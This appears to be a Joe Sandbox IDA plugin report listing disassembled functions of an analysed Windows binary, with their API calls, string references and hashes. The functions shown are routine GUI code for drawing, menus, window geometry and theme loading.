Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
String ID:
API String ID: 4119827998-0
Opcode ID: eea96d1c40095b4b3cca85a9901d9de40de22789253f66f8b085b9d6fdeca42e
Instruction ID: a5e82b56544edb15522875cf200fb4e7000de8fd4cbc5b81efb521d148b7b38d
Opcode Fuzzy Hash: eea96d1c40095b4b3cca85a9901d9de40de22789253f66f8b085b9d6fdeca42e
Instruction Fuzzy Hash: 63D1E77290021DAFDF11DFA4C984AEEBBB9FF08300F20466AE909E7155DB75AA45CF50

Function 0054872F Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 278windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 00548818
GetObjectW.GDI32(?,00000018,?), ref: 00548849
DeleteObject.GDI32(?), ref: 00548856
CreateCompatibleDC.GDI32(00000000), ref: 0054889A
GetObjectW.GDI32(?,00000018,?), ref: 005488B2
SelectObject.GDI32(?,?), ref: 005488D8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 005488F6
SelectObject.GDI32(?,?), ref: 00548909
CreateCompatibleDC.GDI32(?), ref: 0054891F
SelectObject.GDI32(?,?), ref: 00548934
SelectObject.GDI32(?,?), ref: 00548943
DeleteObject.GDI32(?), ref: 00548948
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00548968
GetPixel.GDI32(?,?,?), ref: 00548987
SetPixel.GDI32(?,?,?,00000000), ref: 005489BD
SelectObject.GDI32(?,?), ref: 005489DF
SelectObject.GDI32(?,?), ref: 005489E7
DeleteObject.GDI32(?), ref: 005489EC
DeleteObject.GDI32(?), ref: 00548A6E
__EH_prolog3.LIBCMT ref: 00548736

Part of subcall function 004E0E38: DeleteObject.GDI32 ref: 004E0E51

Strings

TR`ujS, xrefs: 005487CB
, xrefs: 0054885E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$Delete$CompatibleCreate$Pixel$BitmapH_prolog3ImageLoad
String ID: $TR`ujS
API String ID: 2657855633-1980147745
Opcode ID: 93e6a20bba24e31a4fa51b0d78141823c8084cb3b9ae8cf40e1765750396a559
Instruction ID: 024cac6e73b9703d4a22c520de562b331f958b6057509233fe4316de867ae34a
Opcode Fuzzy Hash: 93e6a20bba24e31a4fa51b0d78141823c8084cb3b9ae8cf40e1765750396a559
Instruction Fuzzy Hash: 43B1347180021AEFCF10AFA1CC859FDBFB5FF18308F50852AF916A2161DB359A99DB51

Function 005127AA Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 446windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005127B4
IsWindow.USER32(?), ref: 00512856
GetMenuItemCount.USER32(00000001), ref: 005129B4
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 005129CA
AppendMenuW.USER32(00000001,00000000,00000000,00000000), ref: 005129E5
SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 00512A5B
SendMessageW.USER32(?,0000041C,00000000,?), ref: 00512A98
GetMenuItemCount.USER32(00000001), ref: 00512AEE
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00512B04
AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00512B25
GetMenuItemCount.USER32(00000001), ref: 00512B8C
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00512BA2
AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00512BC3
AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 00512CAB
GetWindow.USER32(?,00000005), ref: 00512CDC
AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 00512D62
GetMenuItemCount.USER32(00000000), ref: 00512DA7
AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 00512DBD
AppendMenuW.USER32(00000000,00000000,00000000,?), ref: 00512DD2

Strings

To`, xrefs: 00512A1F, 00512A34

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Append$CountItem$MessageSendWindow$H_prolog3_
String ID: To`
API String ID: 2495817426-992168270
Opcode ID: 3b260c33d583677d4fdf89871e66d9c7ee8c0d1cf00cd0b79a90547351bacf6d
Instruction ID: 2da2d8eb5d11d0fc98b08f1c454c099a329352a1da7de32268c473be49926adb
Opcode Fuzzy Hash: 3b260c33d583677d4fdf89871e66d9c7ee8c0d1cf00cd0b79a90547351bacf6d
Instruction Fuzzy Hash: 16023930A042159FEF24AF65CC95BADBBB5BF04304F2040AEE50AA7292CF749994DF55

Function 004E8819 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetParent.USER32(?), ref: 004E8853
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 004E8874
GetWindowRect.USER32(?,?), ref: 004E8893
GetWindowLongW.USER32(00000000,000000F0), ref: 004E88C5
MonitorFromWindow.USER32(00000000,00000001), ref: 004E88F9
GetMonitorInfoW.USER32(00000000), ref: 004E8900
CopyRect.USER32(?,?), ref: 004E8914
CopyRect.USER32(?,?), ref: 004E891E
GetWindowRect.USER32(00000000,?), ref: 004E8927
MonitorFromWindow.USER32(00000000,00000002), ref: 004E8934
GetMonitorInfoW.USER32(00000000), ref: 004E893B
CopyRect.USER32(?,?), ref: 004E8949

Strings

(, xrefs: 004E88DB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
String ID: (
API String ID: 783970248-3887548279
Opcode ID: 0d5e30d95529278a78cdf6573bc7fbfa5234b2c1f4fbaba9212562d5ee7e1387
Instruction ID: 1bcc04c9839b12d6a21119fd2c6ce1f6c0032dbb17d252781eb676bd1d10de62
Opcode Fuzzy Hash: 0d5e30d95529278a78cdf6573bc7fbfa5234b2c1f4fbaba9212562d5ee7e1387
Instruction Fuzzy Hash: AC611DB1D00219ABCF10DFA9DD889EEBBB9FF48711F14451AE505F3251CB74A905CBA4

Function 0052F798 Relevance: 28.6, APIs: 19, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0052F7AE
GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0052FE6E,?), ref: 0052F7CD
SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F7F6
GetParent.USER32(?), ref: 0052F7FF
IsZoomed.USER32(?), ref: 0052F80A
EnableMenuItem.USER32(?,0000F000,00000003), ref: 0052F824
EnableMenuItem.USER32(?,0000F010,00000003), ref: 0052F830
EnableMenuItem.USER32(?,0000F030,00000003), ref: 0052F83C

Part of subcall function 004EAB9B: GetParent.USER32(?), ref: 004EABA5

EnableMenuItem.USER32(?,0000F120,00000003), ref: 0052F84F
EnableMenuItem.USER32(?,0000F000,00000000), ref: 0052F85B
EnableMenuItem.USER32(?,0000F010,00000000), ref: 0052F867
EnableMenuItem.USER32(?,0000F030,00000000), ref: 0052F873
GetParent.USER32(?), ref: 0052F87B
DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F8A1
DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0052FE6E,?), ref: 0052F8AD
GetParent.USER32(?), ref: 0052F8B5
DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F8D5
GetParent.USER32(?), ref: 0052F8E7
TrackPopupMenu.USER32(?,00000004,0052FE6E,6AFFFFFF,00000000,?,00000000), ref: 0052F932

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Enable$Parent$Delete$DefaultPopupSystemTrackZoomed
String ID:
API String ID: 4239930045-0
Opcode ID: 821585ffef9f15ced5bf6f94bf641b3472522eb44beeec0b7b5d85af8ad14f9d
Instruction ID: 4209143267905a4e8dfdcf6c2993b13c696b48d8b6d6bdbd2511925a8dd1fc05
Opcode Fuzzy Hash: 821585ffef9f15ced5bf6f94bf641b3472522eb44beeec0b7b5d85af8ad14f9d
Instruction Fuzzy Hash: CB417031240214BFEB316BA2ED46F2A7A69FF89B04F110434F244AB5E1CA75EC10EB14

Function 00526688 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0052669F
LoadCursorW.USER32(00000000,00007F00), ref: 0052670D
SetCursor.USER32(00000000), ref: 00526714
SetRectEmpty.USER32(?), ref: 0052672D

Strings

83`, xrefs: 005266AC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$CaptureEmptyLoadRect
String ID: 83`
API String ID: 2438408-1826646354
Opcode ID: 9f5180f58fee38d4962d63de95a5b863b993410ca3bea96d06fca1b8cc89f8c2
Instruction ID: 3c508d2b0666aad0a19e3983c14c86323bf9f5bdc64c3fba7e5a0913c163abf8
Opcode Fuzzy Hash: 9f5180f58fee38d4962d63de95a5b863b993410ca3bea96d06fca1b8cc89f8c2
Instruction Fuzzy Hash: BFA14A71E002299FCF05EFE8D9889AEBBF6FF49300F14442AE805EB254DB75A945CB50

Function 005438E6 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 237windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005438F0
CreateCompatibleDC.GDI32(00000000), ref: 00543957
GetObjectW.GDI32(006051CC,00000018,000000FF), ref: 00543975
SelectObject.GDI32(?,006051CC), ref: 005439B3
CreateCompatibleDC.GDI32(?), ref: 005439D1
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00543A27
SelectObject.GDI32(?,?), ref: 00543A3C
SelectObject.GDI32(?,00000000), ref: 00543A52
SelectObject.GDI32(?,?), ref: 00543A61
DeleteObject.GDI32(?), ref: 00543A68
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00543ABA
GetPixel.GDI32(?,?,00000000), ref: 00543B82
SetPixel.GDI32(?,?,00000000,?), ref: 00543B97
SelectObject.GDI32(?,?), ref: 00543BB4
SelectObject.GDI32(?,?), ref: 00543BBC

Strings

(, xrefs: 00543A07

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$Create$CompatiblePixel$DeleteH_prolog3_Section
String ID: (
API String ID: 1942225872-3887548279
Opcode ID: c49ee3608b3d971deb8ef63b288514ebe193aae0c702dd241a08c8f08562374f
Instruction ID: d44eb23c5504d44220c0c7330fbe00781b34c6b67a672f93cb94ea1bd4037e8e
Opcode Fuzzy Hash: c49ee3608b3d971deb8ef63b288514ebe193aae0c702dd241a08c8f08562374f
Instruction Fuzzy Hash: B0A1F071C00218DFDF21EFA5C885AEDBBB5FF18318F20462AE556A72A1DB705A46DF10

Function 004DD54D Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504

GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004DD577
GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 004DD58A
GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 004DD59D
GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 004DD5B0
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 004DD5FA
GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 004DD60D
GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 004DD620

Strings

DwmIsCompositionEnabled, xrefs: 004DD60F
DrawThemeParentBackground, xrefs: 004DD571
dwmapi.dll, xrefs: 004DD5DA
DwmDefWindowProc, xrefs: 004DD5FC
EndBufferedPaint, xrefs: 004DD59F
DwmExtendFrameIntoClientArea, xrefs: 004DD5F4
UxTheme.dll, xrefs: 004DD552
BeginBufferedPaint, xrefs: 004DD58C
DrawThemeTextEx, xrefs: 004DD579

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Activate
String ID: BeginBufferedPaint$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 2388279185-3875329446
Opcode ID: a7ba1b6913164b23a3ebd236e7a8e37240d63029300f1984297ca8150697f89e
Instruction ID: 3f7de8aff36ee99be8f01b5b5a9a0c1d816747a4395b3412d2a17bb8b7b55e94
Opcode Fuzzy Hash: a7ba1b6913164b23a3ebd236e7a8e37240d63029300f1984297ca8150697f89e
Instruction Fuzzy Hash: 7A2141B1940B469BC7216F758C58AEBFFE4FF85704F01483FE5BA93251C6786441CA94

Function 00563868 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 206timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001), ref: 00563879
KillTimer.USER32(?,00000002), ref: 00563880
IsWindow.USER32(?), ref: 005638D0
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005638ED
GetCursorPos.USER32(?), ref: 0056392A
ScreenToClient.USER32(?,?), ref: 00563937
KillTimer.USER32(?,00000001), ref: 0056394C
PtInRect.USER32(?,?,?), ref: 0056397B
KillTimer.USER32(?,00000002), ref: 005639F0
GetParent.USER32(?), ref: 00563A05
PtInRect.USER32(?,?,?), ref: 00563A30
KillTimer.USER32(?,00000014), ref: 00563A7E
GetClientRect.USER32(?,?), ref: 00563A97
PtInRect.USER32(?,?,?), ref: 00563AA7

Strings

<L`, xrefs: 005638A6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: KillTimer$Rect$Client$CursorMessageParentPostScreenWindow
String ID: <L`
API String ID: 2803392424-3276711095
Opcode ID: d1e07a42febd3d8994aaf3057bcdbd257b3a0b251deae2eecb5773892e1c220f
Instruction ID: 60a1328ea751b992665af8faeb8ec0a16d460bfa94ce905cb36791d97d0f26d6
Opcode Fuzzy Hash: d1e07a42febd3d8994aaf3057bcdbd257b3a0b251deae2eecb5773892e1c220f
Instruction Fuzzy Hash: E3718B31600604DFCB219FA4CC88ABEBBB6FF84304F20452EF546D7260DB75AA45EB51

Function 0050C01A Relevance: 25.8, APIs: 17, Instructions: 271windowCOMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000004,00000004), ref: 0050C077
InvalidateRect.USER32(?,?,00000001), ref: 0050C089
UpdateWindow.USER32(?), ref: 0050C092
GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 0050C0D1
DispatchMessageW.USER32(?), ref: 0050C0DF
PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0050C0ED
GetCapture.USER32 ref: 0050C0F9
SetCapture.USER32(?), ref: 0050C105
GetCapture.USER32 ref: 0050C111
GetWindowRect.USER32(?,?), ref: 0050C13B
SetCursorPos.USER32(?,?), ref: 0050C15E
GetCapture.USER32 ref: 0050C164
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050C17C
DispatchMessageW.USER32(?), ref: 0050C1A2
ReleaseCapture.USER32 ref: 0050C1E0
IsWindow.USER32(?), ref: 0050C1E9
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0050C202

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendUpdate
String ID:
API String ID: 4077352625-0
Opcode ID: 0dc8509b583c78fdee2e43dbfda94e1a2c37527501832c909e2bed4ed79bd0d8
Instruction ID: 75db84903a31a952dfb5f8b0bba3525019da948d49658ba5a09f33ff585e674b
Opcode Fuzzy Hash: 0dc8509b583c78fdee2e43dbfda94e1a2c37527501832c909e2bed4ed79bd0d8
Instruction Fuzzy Hash: 76916C72A00209AFCB14EFE5DC88DBE7FB9FB0A314B14062AF501E7691DA35AD44CB55

Function 005134C2 Relevance: 24.2, APIs: 16, Instructions: 245windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005134C9
CreateRectRgnIndirect.GDI32(?), ref: 00513506
CopyRect.USER32(?,?), ref: 0051351C
InflateRect.USER32(?,?,?), ref: 00513532
IntersectRect.USER32(?,?,?), ref: 00513540
CreateRectRgnIndirect.GDI32(?), ref: 0051354A
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0051355F

Part of subcall function 00500174: CombineRgn.GDI32(?,00000003,?,?), ref: 00500199

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 005135C7
SetRectRgn.GDI32(?,0000000A,?,?,?), ref: 005135E4
CopyRect.USER32(?,0000000A), ref: 005135EF
InflateRect.USER32(?,?,?), ref: 00513605
IntersectRect.USER32(?,?,0000000A), ref: 00513611
SetRectRgn.GDI32(?,?,?,?,0000000A), ref: 00513626
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00513652

Part of subcall function 00513324: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0051358B), ref: 0051336D
Part of subcall function 00513324: CreatePatternBrush.GDI32(00000000), ref: 0051337A
Part of subcall function 00513324: DeleteObject.GDI32(00000000), ref: 00513386

Part of subcall function 004E06C9: SelectObject.GDI32(?,00000000), ref: 004E06EF
Part of subcall function 004E06C9: SelectObject.GDI32(?,?), ref: 004E0705

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 005136C3
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00513718

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3_Pattern
String ID:
API String ID: 3107162742-0
Opcode ID: bdabad7bbf3ee83a07ec83b9f75fcb07e4071d966ff1aeab1b79db1721f789ac
Instruction ID: 6ad78d851a6a86727835f233777e04676cb00fecf49c04d7218ea8167e88ac31
Opcode Fuzzy Hash: bdabad7bbf3ee83a07ec83b9f75fcb07e4071d966ff1aeab1b79db1721f789ac
Instruction Fuzzy Hash: 99A111B1A00109AFDF05EFE4D899EFEBBB9BF58300F14401AF506E2251DB789A45DB64

Function 0052C792 Relevance: 24.2, APIs: 16, Instructions: 182windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000201,00000201,00000001), ref: 0052C82B
SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0052C848
ReleaseCapture.USER32 ref: 0052C883
GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 0052C892
PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0052C8A6
DispatchMessageW.USER32(?), ref: 0052C8AD
DispatchMessageW.USER32(?), ref: 0052C958
GetCursorPos.USER32(?), ref: 0052C962
PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0052C983

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

